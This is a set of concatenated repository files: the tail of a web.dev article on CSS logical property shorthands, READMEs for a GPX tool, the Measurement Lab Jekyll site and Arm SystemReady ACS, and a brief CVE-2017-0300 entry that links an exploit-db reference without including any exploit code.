```css
position: absolute;
inset-inline: 10px 20px;
```

Further reading and a [full list of inset shorthand and longhand](https://developer.mozilla.org/en-US/docs/Web/CSS/inset) is available on MDN.
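Here's a small sketch of the flow-relative insets in action (the class names are illustrative): the badge sits in the top-right corner of its card on a left-to-right page, and mirrors to the top-left under `dir="rtl"` with no extra CSS.

```css
.card {
  position: relative;
}
.card .badge {
  position: absolute;
  /* physical equivalent in LTR English: top: 0; right: 0; */
  inset-block-start: 0;
  inset-inline-end: 0;
}
```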
### Border shorthands

Border, plus its nested `color`, `style`, and `width` properties, have all got new logical shorthands as well.

Physical longhand:

```css
border-top-color: hotpink;
border-bottom-color: hotpink;
```

Logical shorthand:

```css
border-block-color: hotpink;
/* or */
border-block-color: hotpink hotpink;
```

Physical longhand:

```css
border-left-style: dashed;
border-right-style: dashed;
```

Logical shorthand:

```css
border-inline-style: dashed;
/* or */
border-inline-style: dashed dashed;
```

Physical longhand:

```css
border-left-width: 1px;
border-right-width: 1px;
```

Logical shorthand:

```css
border-inline-width: 1px;
/* or */
border-inline-width: 1px 1px;
```

Further reading and a [full list of border shorthand and longhand](https://developer.mozilla.org/en-US/docs/Web/CSS/border-block) is available on MDN.

## Logical property `<figure>` example

Let's put it all together in a small example. Logical properties can lay out an image with a caption to handle different writing and document directions. You don't have to do much to make a card internationally responsive with a `<figure>` and a few logical properties. If you're curious how all this internationally considerate CSS works together, I hope this is a small meaningful introduction.

### Polyfilling and cross-browser support

The Cascade or build tools are viable options to have old and new browsers alike properly spaced with updated logical properties. For Cascade fallbacks, follow a physical property with a logical one and the browser will use the "last" property it found during style resolution.

```css
p {
  /* for unsupporting browsers */
  margin-top: 1ch;
  margin-bottom: 2ch;

  /* for supporting browsers to use */
  /* and unsupporting browsers to ignore and go 🤷‍♂️ */
  margin-block: 1ch 2ch;
}
```

That's not quite a full solution for everyone though. Here's a handwritten fallback that leverages the `:lang()` pseudo-selector to target specific languages, adjusts their physical spacing appropriately, then at the end offers the logical spacing for supporting browsers:

```css
/* physical side styles */
p {
  margin-top: 1ch;
  margin-bottom: 2ch;
}

/* adjusted physical side styles per language */
:lang(ja) p {
  /* zero out styles not useful for traditional Japanese */
  margin-top: 0;
  margin-bottom: 0;

  /* add appropriate styles for traditional Japanese */
  margin-right: 1ch;
  margin-left: 2ch;
}

/* add selectors and adjust for all supported languages */
:lang(he) p {…}
:lang(mn) p {…}

/* Logical Sides */
/* Then, for supporting browsers to use */
/* and unsupporting browsers to ignore #TheCascade */
p {
  /* remove any potential physical cruft.. */
  margin: 0;
  /* explicitly set logical value */
  margin-block: 1ch 2ch;
}
```

You could also use `@supports` to determine whether or not to provide physical property fallbacks:

```css
p {
  margin-top: 1ch;
  margin-bottom: 2ch;
}

@supports (margin-block: 0) {
  p {
    margin-block: 1ch 2ch;
  }
}
```

[Sass](https://sass-lang.com), [PostCSS](https://github.com/csstools/postcss-logical), [Emotion](https://emotion.sh) and others have automated bundler and/or build time offerings that have a wide array of fallbacks or solutions. Check out each one to see which matches your toolchain and overall site strategy.
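If you'd rather branch at runtime than in the stylesheet, the standard `CSS.supports()` API can drive the same decision. A minimal sketch (the class name is an illustrative convention, not part of any library):

```js
// Flag logical-property support on the root element so the
// stylesheet can opt in with a .supports-logical selector.
if (CSS.supports('margin-block', '1ch')) {
  document.documentElement.classList.add('supports-logical');
}
```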
## What's next

More of CSS will offer logical properties; it's not done yet! There's one big missing set of shorthands though, and a resolution is still pending in this [Github issue](https://github.com/w3c/csswg-drafts/issues/1282). There is a temporary solution [in a draft](https://drafts.csswg.org/css-logical/#logical-shorthand-keyword). What if you want to style all logical sides of a box with a shorthand?

Physical shorthand:

```css
margin: 1px 2px 3px 4px;
margin: 1px 2px;
margin: 2px;
```

Logical shorthand:

```css
margin: logical 1px 2px 3px 4px;
margin: logical 1px 2px;
margin: logical 2px;
```

The current draft proposal would mean you have to write `logical` in every shorthand in order to get the logical equivalent applied, which doesn't sound very [DRY](https://en.wikipedia.org/wiki/Don%27t_repeat_yourself) to some.

There are other proposals to change it at the block or page level, but that could leak logical uses into styles still assuming physical sides.

```css
html {
  flow-mode: physical;
  /* or */
  flow-mode: logical;
  /* now all margin/padding/etc references are logical */
}

/* hopefully no 3rd/1st party code is hard coded to top/left/etc ..? */
```

It's a tough one! Cast your vote, voice your opinion, we want to hear from you.

Want to learn or study logical properties more? Here's a detailed reference, along with guides and examples, [on MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Logical_Properties) 🤓

## Feedback

- To propose changes to the CSS syntax of flow-relative shorthands, first [check the existing issues](https://github.com/w3c/csswg-drafts/labels/css-logical-1) on the csswg-drafts repository. If none of the existing issues match your proposal, [create a new issue](https://github.com/w3c/csswg-drafts/issues/new?title=%5Bcss-logical-1%5D).
- To report bugs on Chromium's implementation of flow-relative shorthands, first [check the existing issues](https://bugs.chromium.org/p/chromium/issues/list?q=component%3ABlink%3ECSS%20logical&can=2) on Chromium Bug Tracker. If none of the existing issues match your bug, [create a new issue](https://bugs.chromium.org/p/chromium/issues/entry?components=Blink%3ECSS).
<a href="/tags/css/" class="w-chip">CSS</a> <a href="/tags/layout/" class="w-chip">Layout</a> <span class="w-mr--sm"> Last updated: Oct 13, 2020 </span> [Improve article](https://github.com/GoogleChrome/web.dev/blob/master/src/site/content/en/blog/logical-property-shorthands/index.md) <a href="/blog" class="w-article-navigation__link w-article-navigation__link--back w-article-navigation__link--single gc-analytics-event">Return to all articles</a> - ### Contribute - <a href="https://github.com/GoogleChrome/web.dev/issues/new?assignees=&amp;labels=bug&amp;template=bug_report.md&amp;title=" class="w-footer__linkbox-link">File a bug</a> - <a href="https://github.com/googlechrome/web.dev" class="w-footer__linkbox-link">View source</a> - ### Related content - <a href="https://blog.chromium.org/" class="w-footer__linkbox-link">Chrome updates</a> - <a href="https://developers.google.com/web/" class="w-footer__linkbox-link">Web Fundamentals</a> - <a href="https://developers.google.com/web/showcase/" class="w-footer__linkbox-link">Case studies</a> - <a href="https://devwebfeed.appspot.com/" class="w-footer__linkbox-link">DevWeb Content Firehose</a> - <a href="/podcasts/" class="w-footer__linkbox-link">Podcasts</a> - <a href="/shows/" class="w-footer__linkbox-link">Shows</a> - ### Connect - <a href="https://www.twitter.com/@ChromiumDev" class="w-footer__linkbox-link">Twitter</a> - <a href="https://www.youtube.com/user/ChromeDevelopers" class="w-footer__linkbox-link">YouTube</a> <a href="https://developers.google.com/" class="w-footer__utility-logo-link"><img src="/images/lockup-color.png" alt="Google Developers" class="w-footer__utility-logo" width="185" height="33" /></a> - <a href="https://developer.chrome.com/home" class="w-footer__utility-link">Chrome</a> - <a href="https://firebase.google.com/" class="w-footer__utility-link">Firebase</a> - <a href="https://cloud.google.com/" class="w-footer__utility-link">Google Cloud Platform</a> - <a href="https://developers.google.com/products" class="w-footer__utility-link">All products</a> <!-- --> - <a href="https://policies.google.com/" class="w-footer__utility-link">Terms &amp; Privacy</a> - <a href="/community-guidelines/" class="w-footer__utility-link">Community Guidelines</a> Except as otherwise noted, the content of this page is licensed under the [Creative Commons Attribution 4.0 License](https://creativecommons.org/licenses/by/4.0/), and code samples are licensed under the [Apache 2.0 License](https://www.apache.org/licenses/LICENSE-2.0). For details, see the [Google Developers Site Policies](https://developers.google.com/site-policies).
66.15404
2,295
0.743482
eng_Latn
0.807797
5381668d0f2dba279649f465bd996cab571d4a96
21
md
Markdown
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
README.md
cedeber/spurilo
14c2c8184a7c48a0b9ef2b03b0050e6207760f8c
[ "Unlicense" ]
null
null
null
# Spurilo GPX Tools
5.25
9
0.714286
eng_Latn
0.317819
53817312f7948735ddf86a0787ddb37fa88cd4cb
145
md
Markdown
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
1
2022-01-08T19:50:44.000Z
2022-01-08T19:50:44.000Z
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
2
2021-12-25T00:46:06.000Z
2022-02-05T04:00:03.000Z
content/artists/stef-mitchell/index.md
AaratiAkkapeddi/ap-studio
844f122fa7081842a13176d9e5db832f7bc0e2b7
[ "0BSD" ]
null
null
null
--- id: 9ee82a14-9bd1-4eeb-a178-a161573852e3 title: Stef Mitchell name: Stef Mitchell featured_project: 15b20378-8a42-4178-b21d-a8e10d3b550e ---
20.714286
54
0.793103
eng_Latn
0.177973
5381ab2fd82c0e9c8ae19c3ea8ad069eb8b27f66
1,132
md
Markdown
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
2,340
2022-02-10T21:04:40.000Z
2022-03-31T14:42:58.000Z
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
19
2022-02-11T16:06:53.000Z
2022-03-11T10:44:27.000Z
2017/CVE-2017-0300.md
justinforbes/cve
375c65312f55c34fc1a4858381315fe9431b0f16
[ "MIT" ]
280
2022-02-10T19:58:58.000Z
2022-03-26T11:13:05.000Z
### [CVE-2017-0300](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300) ![](https://img.shields.io/static/v1?label=Product&message=Microsoft%20Windows&color=blue) ![](https://img.shields.io/static/v1?label=Version&message=n%2Fa&color=blue) ![](https://img.shields.io/static/v1?label=Vulnerability&message=Information%20Disclosure&color=brighgreen) ### Description The kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an authenticated attacker to obtain information via a specially crafted application. aka "Windows Kernel Information Disclosure Vulnerability," a different vulnerability than CVE-2017-8491, CVE-2017-8490, CVE-2017-8489, CVE-2017-8488, CVE-2017-8485, CVE-2017-8483, CVE-2017-8482, CVE-2017-8481, CVE-2017-8480, CVE-2017-8478, CVE-2017-8479, CVE-2017-8476, CVE-2017-8474, CVE-2017-8469, CVE-2017-8462, CVE-2017-0299, and CVE-2017-0297. ### POC #### Reference - https://www.exploit-db.com/exploits/42244/ #### Github No PoCs found on GitHub currently.
62.888889
636
0.759717
eng_Latn
0.200352
538200bd5499cd892bda0d0e599a6534b2ff798d
11,293
md
Markdown
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/2014/relational-databases/replication/publish/specify-schema-options.md
ZubriQ/sql-docs.ru-ru
50559946dabe5fce9eef251a637dc2e3fd305908
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Specify Schema Options | Microsoft Docs
ms.custom: ''
ms.date: 06/13/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology: replication
ms.topic: conceptual
helpviewer_keywords:
- schemas [SQL Server replication], options
- articles [SQL Server replication], transactional replication options
- articles [SQL Server replication], merge replication options
- articles [SQL Server replication], schema options
ms.assetid: 1f85a479-bd6e-4023-abf7-7435a7e5b567
author: MashaMSFT
ms.author: mathoma
manager: craigg
ms.openlocfilehash: e6826d28ec923de221e94b985b740a172bdaa7d5
ms.sourcegitcommit: e042272a38fb646df05152c676e5cbeae3f9cd13
ms.translationtype: MT
ms.contentlocale: ru-RU
ms.lasthandoff: 04/27/2020
ms.locfileid: "73882165"
---
# <a name="specify-schema-options"></a>Specify Schema Options

This topic describes how to specify schema options in [!INCLUDE[ssCurrent](../../../includes/sscurrent-md.md)] by using [!INCLUDE[ssManStudioFull](../../../includes/ssmanstudiofull-md.md)] or [!INCLUDE[tsql](../../../includes/tsql-md.md)]. When you publish a table or view, you can control the object creation options that are applied to the published object. These options can be set when the article is created, and they can also be changed later. If you do not specify these options explicitly, a default set of options is applied.

> [!NOTE]
> The default schema options when using replication stored procedures may differ from the defaults applied when adding articles through [!INCLUDE[ssManStudioFull](../../../includes/ssmanstudiofull-md.md)].

**In This Topic**

- **Before you begin:** [Limitations and Restrictions](#Restrictions), [Recommendations](#Recommendations)
- **To specify schema options, using:** [SQL Server Management Studio](#SSMSProcedure), [Transact-SQL](#TsqlProcedure)

## <a name="before-you-begin"></a><a name="BeforeYouBegin"></a> Before You Begin

### <a name="limitations-and-restrictions"></a><a name="Restrictions"></a> Limitations and Restrictions

- If you change schema options after a publication is created, you must generate a new snapshot.

### <a name="recommendations"></a><a name="Recommendations"></a> Recommendations

- For a complete list of schema options, see the `@schema_option` parameter of [sp_addarticle &#40;Transact-SQL&#41;](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql) and [sp_addmergearticle &#40;Transact-SQL&#41;](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql).

## <a name="using-sql-server-management-studio"></a><a name="SSMSProcedure"></a> Using SQL Server Management Studio

Specify schema options, such as whether to copy constraints and triggers to Subscribers, on the **Properties** tab of the **Article Properties - \<Article>** dialog box. This tab is available in the New Publication Wizard and the **Publication Properties - \<Publication>** dialog box. For more information about using the wizard and accessing the dialog box, see [Create a Publication](create-a-publication.md) and [View and Modify Publication Properties](view-and-modify-publication-properties.md).

#### <a name="to-specify-schema-options"></a>To specify schema options

1. On the **Articles** page of the New Publication Wizard or in the **Publication Properties - \<Publication>** dialog box, select an article, and then click **Article Properties**.
2. Select the articles for which you want to change schema options:

   - Click **Set Properties of Highlighted \<ObjectType> Article** to open the **Article Properties - \<ObjectName>** dialog box. Changes made in this dialog box apply only to the object that is highlighted in the object pane on the **Articles** page.
   - Click **Set Properties of All \<ObjectType> Articles** to open the **Properties for All \<ObjectType> Articles** dialog box. Property changes made in this dialog box apply to all objects of that type in the object pane on the **Articles** page, including objects not selected for publication.

   > [!NOTE]
   > Property changes made in the **Properties for All \<ObjectType> Articles** dialog box override any changes made earlier in the **Article Properties - \<ObjectName>** dialog box. For example, if you want to set a number of defaults for all articles of an object type but also want to set some properties for individual objects, set the defaults for all articles first. Then set the properties for the individual objects.

3. Specify options in the **Copy Objects and Settings to Subscriber** and **Destination Object** sections of the **Properties** tab of the **Article Properties - \<Article>** dialog box.

4. Modify the properties if necessary, and then click **OK**.

5. If you are in the **Publication Properties - \<Publication>** dialog box, click **OK** to save your changes and close the dialog box.

## <a name="using-transact-sql"></a><a name="TsqlProcedure"></a> Using Transact-SQL

Schema options are specified as a hexadecimal value that is the [| (Bitwise OR)](/sql/t-sql/language-elements/bitwise-or-transact-sql) result of one or more options. For more information, see [sp_addarticle](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql) and [sp_addmergearticle](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql).

> [!NOTE]
> You must convert schema option values from **binary** to **int** before performing bitwise operations on them. For more information, see [CAST and CONVERT (Transact-SQL)](/sql/t-sql/functions/cast-and-convert-transact-sql).

#### <a name="to-specify-schema-options-when-defining-an-article-for-a-snapshot-or-transactional-publication"></a>To specify schema options when defining an article for a snapshot or transactional publication

1. At the Publisher on the publication database, execute [sp_addarticle](/sql/relational-databases/system-stored-procedures/sp-addarticle-transact-sql). Specify the name of the publication to which the article belongs for `@publication`, a name for the article for `@article`, the database object being published for `@source_object`, the type of database object for `@type`, and the [| (Bitwise OR)](/sql/t-sql/language-elements/bitwise-or-transact-sql) result of one or more schema options for `@schema_option`. For more information, see [Define an Article](define-an-article.md).

#### <a name="to-specify-schema-options-when-defining-an-article-for-a-merge-publication"></a>To specify schema options when defining an article for a merge publication

1. At the Publisher on the publication database, execute [sp_addmergearticle](/sql/relational-databases/system-stored-procedures/sp-addmergearticle-transact-sql).
Specify the name of the publication to which the article belongs for `@publication`, a name for the article for `@article`, the database object being published for `@source_object`, and the [| (Bitwise OR)](/sql/t-sql/language-elements/bitwise-or-transact-sql) result of one or more schema options for `@schema_option`. For more information, see [Define an Article](define-an-article.md).

#### <a name="to-change-schema-options-for-an-existing-article-in-a-snapshot-or-transactional-publication"></a>To change schema options for an existing article in a snapshot or transactional publication

1. At the Publisher on the publication database, execute [sp_helparticle](/sql/relational-databases/system-stored-procedures/sp-helparticle-transact-sql). Specify the name of the publication to which the article belongs for `@publication` and the name of the article for `@article`. Note the value of the **schema_option** column in the result set.
2. To determine whether a given option is already set, perform a [& (Bitwise AND)](/sql/t-sql/language-elements/bitwise-and-transact-sql) operation using the desired schema option value and the value from step 1.
   - If the result is **0**, the option is not set.
   - If the result is the option value, the option is already set.
3. If the option is not set, perform a [| (Bitwise OR)](/sql/t-sql/language-elements/bitwise-or-transact-sql) operation using the value from step 1 and the desired schema option value.
4. At the Publisher on the publication database, execute [sp_changearticle](/sql/relational-databases/system-stored-procedures/sp-changearticle-transact-sql). Specify the name of the publication to which the article belongs for `@publication`, the name of the article for `@article`, the value **schema_option** for `@property`, and the hexadecimal result from step 3 for `@value`.
5. Run the Snapshot Agent to generate a new snapshot. For more information, see [Create and Apply the Initial Snapshot](../create-and-apply-the-initial-snapshot.md).

#### <a name="to-change-schema-options-for-an-existing-article-in-a-merge-publication"></a>To change schema options for an existing article in a merge publication

1. At the Publisher on the publication database, execute [sp_helpmergearticle](/sql/relational-databases/system-stored-procedures/sp-helpmergearticle-transact-sql). Specify the name of the publication to which the article belongs for `@publication` and the name of the article for `@article`. Note the value of the **schema_option** column in the result set.
2. To determine whether a given option is already set, perform a [& (Bitwise AND)](/sql/t-sql/language-elements/bitwise-and-transact-sql) operation using the desired schema option value and the value from step 1.
   - If the result is **0**, the option is not set.
   - If the result is the option value, the option is already set.
3. If the option is not set, perform a [| (Bitwise OR)](/sql/t-sql/language-elements/bitwise-or-transact-sql) operation using the value from step 1 and the desired schema option value.
4. At the Publisher on the publication database, execute [sp_changemergearticle](/sql/relational-databases/system-stored-procedures/sp-changemergearticle-transact-sql). Specify the name of the publication to which the article belongs for `@publication`, the name of the article for `@article`, the value **schema_option** for `@property`, and the hexadecimal result from step 3 for `@value`.
5. Run the Snapshot Agent to generate a new snapshot. For more information, see [Create and Apply the Initial Snapshot](../create-and-apply-the-initial-snapshot.md).
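The check-and-set pattern in the steps above can be scripted end to end. A minimal T-SQL sketch for a transactional article; the publication/article names and option bit are illustrative, it reads **sysarticles** directly instead of calling sp_helparticle so the value is easy to capture, and it assumes the option bits in play fit in an **int** and that the article name is unique in the publication database:

```sql
DECLARE @publication sysname = N'MyPublication';  -- illustrative name
DECLARE @article     sysname = N'MyArticle';      -- illustrative name
DECLARE @option      int     = 0x20;              -- illustrative option bit

-- Step 1: read the current schema_option (stored as binary) as an int.
DECLARE @current int;
SELECT @current = CONVERT(int, schema_option)
FROM sysarticles
WHERE name = @article;

-- Step 2: bitwise AND reveals whether the bit is already set.
IF (@current & @option) = 0
BEGIN
    -- Step 3: bitwise OR in the desired bit, then render it as a hex string.
    DECLARE @hex nvarchar(20) =
        CONVERT(nvarchar(20), CONVERT(varbinary(8), @current | @option), 1);

    -- Step 4: write the new value back. Changing schema_option invalidates
    -- the existing snapshot, hence @force_invalidate_snapshot = 1.
    EXEC sp_changearticle
        @publication = @publication,
        @article     = @article,
        @property    = N'schema_option',
        @value       = @hex,
        @force_invalidate_snapshot = 1;

    -- Step 5 (not shown): run the Snapshot Agent to generate a new snapshot.
END;
```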
## <a name="see-also"></a>See Also

[Publish Data and Database Objects](publish-data-and-database-objects.md)
[Article Options for Transactional Replication](../transactional/article-options-for-transactional-replication.md)
88.226563
595
0.763482
rus_Cyrl
0.865466
538231db3f97af4cb4b87293bedb4131f38ce0d9
2,048
md
Markdown
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
1
2022-01-24T09:57:43.000Z
2022-01-24T09:57:43.000Z
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
null
null
null
projects/kubernetes-csi/external-snapshotter/README.md
DanielQujun/eks-distro
c6de425a2fea2ecef06c463e425f63d734125d64
[ "Apache-2.0" ]
null
null
null
## CSI external-snapshotter | Release | Version | | --- | --- | | 1-18 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-19 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-20 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | | 1-21 | ![Version](https://img.shields.io/badge/version-v3.0.3-blue) | ### Updating 1. Determine the version of CSI external-snapshotter to use. 1. Consult the EKS team and consider options among the [supported versions](https://kubernetes-csi.github.io/docs/external-snapshotter.html#supported-versions). 2. Review [releases](https://github.com/kubernetes-csi/external-snapshotter/releases), [tags](https://github.com/kubernetes-csi/external-snapshotter/tags), and [changelogs](https://github.com/kubernetes-csi/external-snapshotter/tree/master/CHANGELOG), carefully looking for updates that may affect EKS-Distro or downstream projects like EKS-Anywhere. 2. Update the `GIT_TAG` file to have the new, desired version based on the `external-snapshotter` release tags. 3. Compare the old tag to the new one, looking specifically for Makefile changes. For example: [v3.0.3 compared to v4.2.0](https://github.com/kubernetes-csi/external-snapshotter/compare/v3.0.3...v4.2.0). Check the `external-snapshotter` target for any build flag changes, tag changes, dependencies, etc. Check that the manifest target, which is called from the EKS-D Makefile, has not changed. 4. Verify the Golang version has not changed. The version specified in [`go.mod`](https://github.com/kubernetes-csi/external-snapshotter/blob/master/go.mod) seems to be kept up to date. Be sure to select the correct branch for the release when checking the Golang version. 5. Update CHECKSUMS and attribution by using `make update-attribution-checksums-docker PROJECT=kubernetes-csi/external-snapshotter RELEASE_BRANCH=<release_branch>` from the root of the EKS-Distro repo. 6. Update the version at the top of this README.
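A sketch of steps 2 and 5 above as shell commands. The target tag and release branch are illustrative, and the GIT_TAG path assumes the file sits next to this README:

```bash
# From the root of the EKS-Distro repo: bump the tag...
echo "v4.2.0" > projects/kubernetes-csi/external-snapshotter/GIT_TAG

# ...then regenerate CHECKSUMS and attribution for a release branch.
make update-attribution-checksums-docker \
  PROJECT=kubernetes-csi/external-snapshotter RELEASE_BRANCH=1-21
```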
55.351351
122
0.736816
eng_Latn
0.742099
53828e844e42574222ac71a13db1fbabf7d619a0
576
md
Markdown
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
includes/app-service-web-create-resource-group-linux.md
simba83/azure-docs.sv-se
028021e0d8a2cf4ea654c4d4016ebb9a601b95b0
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: include file
description: include file
services: app-service
author: cephalin
ms.service: app-service
ms.topic: include
ms.date: 08/20/2018
ms.author: cephalin
ms.custom: include file
ms.openlocfilehash: 02a6b88dfb37be41a4da8b35d7c524b905ceed8d
ms.sourcegitcommit: eb6bef1274b9e6390c7a77ff69bf6a3b94e827fc
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 10/05/2020
ms.locfileid: "67187994"
---
## <a name="create-a-resource-group"></a>Create a resource group

[!INCLUDE [resource group no heading](app-service-web-create-resource-group-linux-no-h.md)]
28.8
91
0.800347
eng_Latn
0.172233
5382b2349698edec6276d7e2793f563ae0dee8ac
3,731
md
Markdown
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
README.md
mtlynch/m-lab.github.io-2
086e59ca0d59a35aa8ad3fc6b80376adc2cda716
[ "Apache-2.0" ]
null
null
null
# [Measurement Lab](http://www.measurementlab.net/) Source Code

This is the source code of the Measurement Lab website, built using [Jekyll](http://jekyllrb.com) and utilizing [GitHub Pages](https://pages.github.com/) to publish and host the site.

Current Build Status is: [![Build Status](https://secure.travis-ci.org/m-lab/m-lab.github.io.png?branch=master)](http://travis-ci.org/m-lab/m-lab.github.io)

## Local Development

**Please Note** This repository contains a submodule, so after cloning this repo, you will also need to run `git submodule init` and `git submodule update` to pull down the submodule files as well.

1. Install dependencies: `bundle install`
2. Run the Jekyll server and pass in a blank baseurl to preview in development mode: `jekyll serve --baseurl ''`.
3. View the generated site by going to [http://localhost:4000/](http://localhost:4000/)

### HTML Compression

This site enables HTML compression for optimizing performance. If it is desired not to compress pages while doing development, developers can simply remove ``layout: compress`` from the default template in the _layouts folder.

## Site Structure

| Directory | Description |
| ------------- |:------------- |
| _data | Directory contains yml files that contain content that is not within individual pages or posts. |
| _includes | Contains several partials that are common to several generated pages. |
| _layouts | Contains the templates that are used to generate the commonality of the pages (default is the main one that all the pages use). |
| _pages | Contains all non-blog post pages. Pages that have a number prepended to the filename are used to dynamically generate the main navigational header. They will display in the header in the order of the prepended numbers. These pages must also contain the `menu-item: true` frontmatter. |
| _posts | Contains all of the individual blog entries. |
| css | Contains the css for the project. |
| fonts | Contains the customized font libraries for the project. |
| js | Contains the js libraries for the project. |
| images | Contains all the image files for the site |
| publications | Contains all the pdfs and docs that the site links to |

## Code Standards

This section highlights the coding standards to be used for this project to ensure consistency across the codebase for current and future development.

### Filename conventions

- Should be all lowercase, with words concatenated with a hyphen

### Variable naming conventions

- All yml frontmatter keys should be lowercase, with words concatenated with a hyphen

### Liquid

- All liquid variables follow an underscore pattern so they are easier to differentiate from yml frontmatter variables
- All liquid tags, objects, and filters will have spaces in front of and following whatever is contained within braces

### Travis CI integration

Travis is configured (via .travis.yml) to take the following actions after a push:

- Build a static Jekyll site from the source.
- Deploy the built site to Amazon S3.

In order to [deploy to S3](https://docs.travis-ci.com/user/deployment/s3/), the secret key for the Amazon AWS [IAM account](https://aws.amazon.com/iam/) to be used must be encrypted in .travis.yml. The secret key is [encrypted](https://docs.travis-ci.com/user/encryption-keys/) using the public key for the repository in Travis CI. If the Amazon credentials change, then the keys in .travis.yml will need to be updated.
The ```access_key_id``` can be entered in plain text, but the secret key should be encrypted using the [travis CLI utility](https://github.com/travis-ci/travis.rb) like so:

```$ travis encrypt secret_access_key:<SECRET KEY> -r m-lab/m-lab.github.io```
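Putting the local-development notes above together, a minimal shell sketch (assumes Ruby and Bundler are installed; the clone URL follows from the repository name):

```bash
git clone https://github.com/m-lab/m-lab.github.io.git
cd m-lab.github.io
git submodule init && git submodule update  # pull down the submodule files
bundle install                              # install dependencies
jekyll serve --baseurl ''                   # preview at http://localhost:4000/
```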
61.163934
592
0.761726
eng_Latn
0.995909
5383176e25bb66753cd915db8e86e61fb9861e18
4,121
md
Markdown
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
null
null
null
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
null
null
null
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
1
2021-09-16T16:19:26.000Z
2021-09-16T16:19:26.000Z
# Arm SystemReady ACS

## Introduction to Arm SystemReady

Systems that are designed to just work for the end user, with the ability to install and run generic, off-the-shelf operating systems out of the box, must follow a set of minimum hardware and firmware requirements. For the Arm ecosystem, this requirement first surfaced in the server segment.

The Arm ServerReady compliance certification program provides this "just works" solution for servers, allowing you to deploy Arm servers with confidence. The program is based on industry standards and is accompanied by a compliance test suite and a process for certification.

The Arm SystemReady program is a natural extension of the Arm ServerReady program. Different market segments may target different sets of operating systems and hypervisors with different hardware and firmware requirements. We use the term band to identify these differences, with a shorthand notation for each band. The bands are:
* [SystemReady SR](https://developer.arm.com/architectures/system-architectures/arm-systemready/sr)
* [SystemReady LS](https://developer.arm.com/architectures/system-architectures/arm-systemready/ls)
* [SystemReady ES](https://developer.arm.com/architectures/system-architectures/arm-systemready/es)
* [SystemReady IR](https://developer.arm.com/architectures/system-architectures/arm-systemready/ir)

For more information, visit: [Arm SystemReady](https://developer.arm.com/architectures/system-architectures/arm-systemready)

This repository contains the infrastructure to build the Architecture Compliance Suite and the bootable prebuilt images to be used for the certifications of the various bands of SystemReady.

Note: Currently the SystemReady ES and IR bands are supported in this repository. For SystemReady SR, refer to the [Arm Enterprise ACS repository](https://github.com/ARM-software/arm-enterprise-acs).

## SystemReady bands:

Navigate to the ES or IR band for further details on specific scripts and prebuilt images, through the directories below:
* [ES](./ES)
* [IR](./IR)

## SystemReady Security Interface Extension:

The SystemReady Security Interface Extension certifies that firmware meets the requirements specified by the Arm [Base Boot Security Requirements specification](https://developer.arm.com/documentation/den0107/latest) (BBSR). The Security Interface Extension is optionally applicable to the SystemReady SR, ES and IR bands, but not the LS band.

Further details on the Security Interface Extension, including pre-built images, are here:
* [Security Interface Extension](https://github.com/ARM-software/arm-systemready/tree/security-interface-extension-acs/security-interface-extension)

## Limitations

